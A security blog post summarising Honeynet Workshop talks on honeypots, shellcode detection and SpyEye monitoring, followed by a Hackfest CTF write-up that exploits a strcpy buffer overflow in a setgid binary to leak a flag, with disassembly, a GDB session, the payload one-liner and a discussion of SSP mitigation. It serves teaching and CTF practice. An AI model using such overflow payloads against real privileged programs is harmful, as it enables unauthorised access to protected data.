There was also a CTF taking place during the day so I didn't take as many notes as I wanted; this is also why I will not be covering all the talks in this article.
All the slides are available here : http://www.honeynet.org/node/626


R&D in Honeynet Project by David Watson

The first talk presented some of the current Honeynet projects. Through the years the Honeynet Project has been a major player in the domain of botnet tracking with the release of numerous open-source honeypots and articles on the subject.
Fortunately, the projects are still very active, in part thanks to the Google Summer of Code, for which the Honeynet Project is a mentoring organization. By the way, if you are a full-time university student and would like to be paid to work on some kickass open-source software, the Honeynet Project was selected again this year and the application period starts March 28th.

As a quick reminder, an important concept with honeypots is the distinction between high-interaction and low-interaction honeypots.
Low-interaction means that the honeypot is not relying on the original system but is emulating it. High-interaction honeypots usually are implemented as addons, for example through a kernel module, that tracks the internal changes to the system.

Both approaches have their advantages, low-interaction is usually safer since it is emulating the system being attacked and is thus not vulnerable to the flaws in that system. It usually scales better since it is emulating only the parts needed and thus requires less resources, as opposed to high-interaction
honeypots that often require a complete virtual machine.
On the other side, high-interaction honeypots are better at discovering unknown flaws (0days).  Depending on the complexity of the target system, the implementation of a high-interaction honeypot might take less time than writing an emulation stack for it.

The first project presented by David was Dionaea, a low-interaction honeypot that aims to replace Nepenthes, a popular Honeynet tool. The fact that it uses Python makes it easier to extend than Nepenthes, which was written in C++. It integrates libemu for automated shellcode detection. It also has a SQL interface, which makes it easier to query the results than parsing log files.

The second project David talked about is Sebek, a high-interaction honeypot that integrates into the Windows kernel. It currently uses SSDT hooking for tracing, a technique also used by rootkits (proof that techniques and knowledge are not malicious in themselves).

David mentioned they want to change the hooking to inline kernel modifications to make it stealthier. The replacement for this project is called Qebek; it uses QEMU and relies on breakpoints to monitor events, making it possible, for example, to see keystrokes on the system as they happen. I don't know if the authors are aware that the project name sounds a lot like Québec, the province I come from (and also the name of a project which you will learn about in the upcoming weeks/months, stay tuned!).

Another Honeynet project is Capture-HPC, a client-side honeypot (i.e. for browsers) that uses VMware. The fact that it relies on virtual machines makes it hard to scale. That's where PhoneyC comes in. It is written in Python and supports personalities to modify the behaviour of the browser. It uses SpiderMonkey as its JavaScript engine and can also mock ActiveX controls. Like Dionaea, it uses libemu for shellcode detection. Later during the day Angelo Dell'Aera, the author of the software, mentioned that he is currently working on switching to the V8 JavaScript engine (the one used in Chrome), since SpiderMonkey has a very limited API which makes it hard to extend.

Finally, Glastopf is a web honeypot that emulates a web server and is useful for detecting attacks against vulnerabilities such as RFI, LFI and SQL injection. Lukas Rist, the author of the project, gave a short live demonstration of the tool running on one of his web servers, and we could see attacks coming in every few seconds.
As you can see, there are a lot of great honeypots being developed by the Honeynet Project; make sure you have a look at them.



Efficient Analysis of Malicious Bytecode: Linespeed Shellcode Detection and Fast Sandboxing by Georg 'oxff' Wicherski

In this talk, Georg presented a shellcode detection library he designed and explained some of its inner workings. He started with a quick overview of what shellcode is and how it is made position-independent via a GetPC sequence.

Apart from the traditional call-pop sequence, which is the standard one, he also mentioned the use of floating-point instructions, namely fnop and fnstenv, to get the current address, a technique I wasn't aware of.

Georg then explained the differences between the two current approaches to shellcode detection: statistical methods and pattern matching. Statistical methods rely on the likelihood that a sequence of instructions appears inside or outside shellcode, much like Bayesian filters do to detect spam. This method requires training and is prone to both false negatives and false positives.

For these reasons, Georg preferred to implement a method based on GetPC sequence identification and then emulation of the instructions preceding the GetPC sequence to remove false positives.
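
As a rough illustration of the first stage described above (spotting GetPC candidates before any emulation), here is a minimal sketch in C. It is not libscizzle's code, whose source is not available. The function name `find_getpc_candidate`, the `MAX_BACK` window, and the choice of recognising only two encodings (a `call rel32` with a zero or small backward displacement, and the common `fnstenv [esp-0xc]` encoding `D9 74 24 F4`) are all assumptions made for the example.

```c
#include <stddef.h>
#include <stdint.h>

/* Assumed heuristic: a GetPC call jumps at most this far backwards. */
#define MAX_BACK 512u

/*
 * Scan buf for the first byte sequence that looks like a GetPC primitive.
 * Returns its offset, or -1 if no candidate is found.
 * A real detector would then emulate around the candidate to weed out
 * false positives; this sketch stops at the pattern match.
 */
long find_getpc_candidate(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        /* fnstenv [esp-0xc], as used by many encoders: D9 74 24 F4 */
        if (len - i >= 4 &&
            buf[i] == 0xD9 && buf[i + 1] == 0x74 &&
            buf[i + 2] == 0x24 && buf[i + 3] == 0xF4)
            return (long)i;

        /* call rel32: opcode E8 followed by a little-endian displacement */
        if (len - i >= 5 && buf[i] == 0xE8) {
            uint32_t disp = (uint32_t)buf[i + 1]
                          | (uint32_t)buf[i + 2] << 8
                          | (uint32_t)buf[i + 3] << 16
                          | (uint32_t)buf[i + 4] << 24;
            /* disp == 0 is "call $+5"; values near 2^32 are small negatives */
            if (disp == 0 || disp >= 0u - MAX_BACK)
                return (long)i;
        }
    }
    return -1;
}
```

A plain pattern match like this one will fire on plenty of harmless data, which is exactly why an emulation step is needed afterwards.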

Georg implemented this in a library named libscizzle. It uses libemu for emulation. Since performance was one of the project goals, it also uses sandboxed hardware execution to make it faster.

Georg mentioned that he successfully used this library in CTFs (Defcon, RuCTFe). The library is available for download here in the form of a pre-compiled shared object (the Unix equivalent of a DLL), some header files and a small test application; the source code is not available.


High Performance Packet Sniffing by Tillmann Werner

In this talk Tillmann explained the design of, and the need for, two tools he wrote: multicap and streams.

multicap is a tool for high-performance packet sniffing that aims to avoid dropped packets. To increase performance, Tillmann used a ring buffer to reduce memory allocations. He also used a PF_PACKET socket, which has the advantage of already including the timestamp with the packet, removing the need to call the localtime() function for every packet. Finally, multicap uses memory-mapped files to dump the packets, which should increase performance. Tillmann did a quick demo of his tool. A performance comparison with existing tools like tcpdump and dumpcap would have been nice.
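
To show why a ring buffer removes per-packet allocations, here is a minimal single-threaded sketch in C. It is not multicap's actual code: the names `ring_push` and `ring_pop`, the slot count and the slot size are assumptions chosen for the example. All slots are allocated once and then reused, so capturing a packet costs one copy and no call to malloc().

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SLOT_COUNT 8      /* assumed; must be a power of two */
#define SLOT_SIZE  2048   /* assumed maximum captured packet size */

struct slot {
    uint32_t len;
    uint8_t  data[SLOT_SIZE];
};

struct ring {
    struct slot slots[SLOT_COUNT];  /* allocated once, reused for every packet */
    size_t head;                    /* free-running count of packets written */
    size_t tail;                    /* free-running count of packets read */
};

/* Store one packet. Returns 0 on success, -1 if the ring is full
 * or the packet does not fit in a slot. */
int ring_push(struct ring *r, const uint8_t *pkt, uint32_t len)
{
    if (len > SLOT_SIZE || r->head - r->tail == SLOT_COUNT)
        return -1;
    struct slot *s = &r->slots[r->head % SLOT_COUNT];
    memcpy(s->data, pkt, len);
    s->len = len;
    r->head++;
    return 0;
}

/* Return the oldest stored packet, or NULL if the ring is empty.
 * The slot may be overwritten by a later ring_push(). */
const struct slot *ring_pop(struct ring *r)
{
    if (r->head == r->tail)
        return NULL;
    return &r->slots[r->tail++ % SLOT_COUNT];
}
```

When the ring is full, `ring_push` refuses the packet, which is the situation a capture tool wants to avoid by draining the ring to disk fast enough.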

The second tool is streams. It does TCP stream reassembly for a packet trace (pcap file), in a similar way to the "Follow TCP Stream" feature of Wireshark. streams is interactive and makes it possible to filter or search the streams.

Both tools are open source and available here:


Basics of Honeyclients by Angelo Dell'Aera and Christian Seifert

This talk dealt with two complementary subjects: the rise of client-side attacks and the tools developed by the Honeynet Project to detect those attacks. As I already talked a bit about PhoneyC and Capture-HPC in the first section of this article, I will focus mostly on the second part of the talk.

For a couple of years now there has been a shift in attacks toward client-side applications (browsers, Flash, Adobe Reader, Java, etc.). Keeping client applications and all their plugins up to date is a challenge for a lot of users and enterprises and, as Christian mentioned, client applications are driven by end users, who remain the weakest link in the security chain.

The talk then explained how cyber-criminals use the web to distribute malware via Malware Distribution Networks. Christian presented a diagram taken from the Microsoft Security Intelligence Threat Report, which I found really interesting.
[Diagram: Malware Distribution Network (MDN)]
Source: Microsoft Security Intelligence Threat Report (http://www.microsoft.com/sir)

The attacks generally use multiple layers of servers.
The first layer consists of compromised web servers (often via unpatched vulnerabilities in popular applications) which link to another server, most of the time via injected iframes. That second server, known as the redirector, embeds or redirects to another server which hosts an exploit kit. If one of the exploits succeeds, it downloads and installs malware from yet another server.

Generally a lot of infected sites point to the same exploit server; the amount of traffic diverted to it determines its effectiveness. Having multiple legitimate servers linking to a redirector also increases its ranking in search engines, which can be further increased via SEO campaigns.


Microsoft estimates that 2.8% of exploit servers are responsible for 84% of drive-by downloads. What is particularly noteworthy is that the infection links usually remain active for only a few days or even hours; by the time the links are flagged as malicious by lists such as Google SafeBrowsing or McAfee SiteAdvisor they are often already inactive. This also makes it harder for security companies to retrieve the malicious content. The use of JavaScript obfuscation further complicates the task of researchers.



Spy VS Spy : Countering SpyEye with SpyEye by Lance James

The last talk of the day dealt with SpyEye, a botnet kit which has generated a lot of buzz lately since it is supposedly merging with ZeuS.

SpyEye is a kit cyber-criminals can buy for around 1,000 to 3,000 US$. It is customizable and comes with modules to steal credit card numbers and credentials via form grabbing in browsers, to harvest credentials for FTP, POP, etc. In summary, it's pretty nasty. It also comes with a web panel where crooks can see the bots they control and the information they have gathered.


Lance then explained that in the current version, a lot of files on the C&C server are world-readable via the AJAX interface, including debug logs, configuration files and SQL backups. The web panel asks for a password when connecting, and although Lance had the password from the SQL backup, it would be illegal for him to connect in the USA. However, it is possible to connect a local SpyEye instance to a remote server (proxy mode) with no authentication whatsoever. Another advantage of this technique is that the botnet information is updated in the web panel in real time. Pretty neat :)

Lance also presented statistics regarding the botnet he tracked. It was discovered in October 2010 and infected 28,590 unique computers. When you consider the quantity of information that was probably stolen during such a short period of time and the potential economic gain, it is not hard to understand why cybercrime is so popular.

The question of laws and ethics also came up in this talk. Lance repeated numerous times that we are at a point where "Defense is dead" and we need to gain visibility. There is an increase in aggressive attacks on big companies, governments and even security firms (think HBGary). The threat is growing exponentially and diversifying into politically oriented attacks. Other attendees joined the discussion, and there was evident frustration and discontent with the fact that researchers have to fight adversaries who have no respect for laws or ethical principles and who mostly stay out of reach of the legal system, while the researchers themselves must hold to high ethical standards (especially with regard to privacy) and weigh their every move to make sure they are not putting themselves in legal trouble.

I really had a good time attending the Honeynet Workshop; it was great to get a glimpse of the Honeynet Project from the inside.

lundi 8 novembre 2010

Hackfest 2010 ExecUS #4 solution

This weekend Hackfest 2010 took place in Québec City, with its traditional security competition on Saturday night. Our team finished in 2nd place; congratulations to our good friends from Amish Security, who won hands down.

NOTE: I am using a recompiled version of the binary here, so the addresses shown in this solution are probably not the same as those of the original binary. If you want to try it on a recent Linux, make sure to disable SSP:

gcc -fno-stack-protector -o execus4 execus4.c 

This article presents the solution to the ExecUS #4 challenge, whose code is shown here:



The program opens the file flag.txt (I changed the name but the principle is the same), which contains the flag, and copies it to /dev/null. The flag.txt file is not directly accessible, but the binary has the SGID bit set and its group has read access to the file.

On line 27 we find a very standard buffer overflow, since the length of argv[1] is never checked beforehand.

strcpy(buf, argv[1]);

Judging by the order in which the variables are declared, the ofd variable can probably be overwritten, which we can verify by disassembling the code:

 804856a:    e8 41 fe ff ff           call   80483b0 <open@plt>
 804856f:    89 84 24 28 01 00 00     mov    %eax,0x128(%esp)
 8048576:    c7 44 24 04 01 00 00     movl   $0x1,0x4(%esp)
 804857d:    00
 804857e:    8d 44 24 1a              lea    0x1a(%esp),%eax
 8048582:    89 04 24                 mov    %eax,(%esp)
 8048585:    e8 26 fe ff ff           call   80483b0 <open@plt>
 804858a:    89 84 24 24 01 00 00     mov    %eax,0x124(%esp)
 8048591:    8b 45 0c                 mov    0xc(%ebp),%eax
 8048594:    83 c0 04                 add    $0x4,%eax
 8048597:    8b 00                    mov    (%eax),%eax
 8048599:    89 44 24 04              mov    %eax,0x4(%esp)
 804859d:    8d 44 24 24              lea    0x24(%esp),%eax
 80485a1:    89 04 24                 mov    %eax,(%esp)
 80485a4:    e8 57 fe ff ff           call   8048400 <strcpy@plt>

As we can see, the result of the 2nd call to open, which opens /dev/null for writing, is stored at ESP+0x124 (ofd), and the address strcpy writes to (buf) is ESP+0x24. The ofd variable is therefore located 0x100 bytes after buf; in decimal that is 256 bytes, which matches the length of buf.
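
The layout can be modelled with a small C sketch. This is only a simplified stand-in for the real stack frame, assuming a little-endian machine with 4-byte int such as x86; the struct `frame` and the function `ofd_after_copy` are hypothetical names, not taken from the challenge source. The copy is performed over the whole struct and clamped to its size so that the sketch itself stays within defined behaviour.

```c
#include <stddef.h>
#include <string.h>

/* Simplified model of the relevant part of main()'s frame:
 * ofd sits right after the 256 bytes of buf. */
struct frame {
    char buf[256];
    int  ofd;
};

/*
 * Model strcpy(buf, arg) running past the end of buf.
 * Returns the value ofd holds after the copy.
 */
int ofd_after_copy(const char *arg)
{
    struct frame f;
    size_t n = strlen(arg) + 1;   /* strcpy also copies the terminating NUL */

    memset(&f, 0, sizeof f);
    f.ofd = 6;                    /* descriptor value seen in the GDB session */
    if (n > sizeof f)
        n = sizeof f;             /* stay inside the model */
    memcpy(&f, arg, n);
    return f.ofd;
}
```

With an argument of 256 filler characters followed by the byte 0x01, the 257th byte lands on the low byte of ofd and the terminating NUL lands on its second byte, which is already zero for a small descriptor such as 6, so the function returns 1 on a little-endian machine.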

So we can overwrite ofd, but how is that useful to us? To understand, we need to look at how UNIX works. The ofd variable holds what is called a file descriptor, which is an index into the table of files opened by the process. Every process normally starts with the following special descriptors:

Standard input (stdin)   : 0
Standard output (stdout) : 1
Standard error (stderr)  : 2
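
To make concrete the idea that a descriptor is just an integer index, here is a minimal sketch of a copy loop in C. Since the challenge source is not reproduced here, `copy_fd` is a hypothetical stand-in for the program's copy routine, not the original code.

```c
#include <unistd.h>

/*
 * Copy everything readable from ifd to ofd.
 * Returns the number of bytes copied, or -1 on error.
 * The function does not care what ofd refers to: /dev/null, a file,
 * or descriptor 1 (standard output) are all handled the same way.
 */
ssize_t copy_fd(int ifd, int ofd)
{
    char chunk[256];
    ssize_t n, total = 0;

    while ((n = read(ifd, chunk, sizeof chunk)) > 0) {
        if (write(ofd, chunk, (size_t)n) != n)
            return -1;
        total += n;
    }
    return n < 0 ? -1 : total;
}
```

Calling `copy_fd(ifd, 1)` instead of `copy_fd(ifd, ofd)` would send the same bytes to the terminal rather than to /dev/null.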

The solution is now obvious: we just need to overwrite ofd with the value 1 so that the key is written to standard output and shows up on the screen. We will build a string made of 256 characters to fill buf, followed by the value 1 to overwrite ofd. This string can be passed as an argument in GDB with the following command:

run $(ruby -e 'print "A" * 256 + "\x01"')

We can check that our exploit works using GDB. We start by setting a breakpoint just before the call to strcpy to examine the value of ofd.

(gdb) b *0x080485a4
Breakpoint 1 at 0x804858a: file execus4.c, line 25.
(gdb) run $(ruby -e 'print "A" * 256 + "\x01"')
Starting program: /home/ekse/code/execus4 $(ruby -e 'print "A" * 256 + "\x01"')
Dev null is an awesome 100% compression ratio, secure, backup device.

Breakpoint 1, 0x080485a4 in main (argc=2, argv=0xbffff3b4)
(gdb) x/x $esp+0x124
0xbffff2f4:    0x00000006

The value of ofd is currently 0x06. The following listing shows that the value is indeed overwritten by our overflow.

(gdb) nexti
(gdb) x/65x $esp+0x24
0xbffff1f4:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff204:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff214:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff224:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff234:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff244:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff254:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff264:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff274:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff284:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff294:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff2a4:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff2b4:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff2c4:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff2d4:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff2e4:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff2f4:    0x00000001
(gdb) x/x $esp+0x124
0xbffff2f4:    0x00000001

Now that we know our exploit works, we only need to run the binary directly to get the flag (unfortunately I did not save the original flag).

ekse@eclipse:~/code$ ./execus4 $(ruby -e 'print "A" * 256 + "\x01"')
Dev null is an awesome 100% compression ratio, secure, backup device.
ALLGLORYTOTHEHYPNOTOAD


A word on SSP

The binary used during the competition was not compiled with security mechanisms such as SSP, to make the solution easier. Using SSP blocks this avenue of exploitation. However, it is not the canary that does so (canaries were, by the way, the subject of a very good presentation by Paul Rascagneres at Hackfest), since we are not trying to overwrite the return address.

The mitigation instead comes from the fact that SSP reorders the variables on the stack to place arrays after fixed-size variables. The following listing shows the same code as above, but with SSP enabled:

 80485f5:    e8 fa fd ff ff           call   80483f4 <open@plt>
 80485fa:    89 44 24 30              mov    %eax,0x30(%esp)
 80485fe:    c7 44 24 04 01 00 00     movl   $0x1,0x4(%esp)
 8048605:    00
 8048606:    8d 84 24 39 01 00 00     lea    0x139(%esp),%eax
 804860d:    89 04 24                 mov    %eax,(%esp)
 8048610:    e8 df fd ff ff           call   80483f4 <open@plt>
 8048615:    89 44 24 34              mov    %eax,0x34(%esp)
 8048619:    8b 44 24 1c              mov    0x1c(%esp),%eax
 804861d:    83 c0 04                 add    $0x4,%eax
 8048620:    8b 00                    mov    (%eax),%eax
 8048622:    89 44 24 04              mov    %eax,0x4(%esp)
 8048626:    8d 44 24 39              lea    0x39(%esp),%eax
 804862a:    89 04 24                 mov    %eax,(%esp)
 804862d:    e8 12 fe ff ff           call   8048444 <strcpy@plt>
 

As we can see, the ofd variable is now at ESP+0x34 and buf starts at ESP+0x39. Since strcpy writes toward higher addresses, overflowing buf can no longer reach ofd.
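
The effect of the reordering can be modelled with a short C sketch. It is a simplified model under assumptions, not the real frame: the struct `ssp_frame` and the function `ofd_after_copy_ssp` are hypothetical names, and the copy is clamped to the end of the struct so that the sketch stays within defined behaviour.

```c
#include <stddef.h>
#include <string.h>

/* Simplified model of the SSP layout: scalars first, arrays last. */
struct ssp_frame {
    int  ofd;
    char buf[256];
};

/*
 * Model strcpy(buf, arg) with the reordered layout.
 * Returns the value ofd holds after the copy.
 */
int ofd_after_copy_ssp(const char *arg)
{
    struct ssp_frame f;
    size_t room = sizeof f - offsetof(struct ssp_frame, buf);
    size_t n = strlen(arg) + 1;   /* strcpy also copies the terminating NUL */

    memset(&f, 0, sizeof f);
    f.ofd = 6;
    if (n > room)
        n = room;   /* in a real frame the excess bytes run toward the
                       canary and return address, never back toward ofd */
    memcpy((char *)&f + offsetof(struct ssp_frame, buf), arg, n);
    return f.ofd;
}
```

Whatever the length of the argument, the bytes are written at addresses above buf, so the function always returns the original descriptor value.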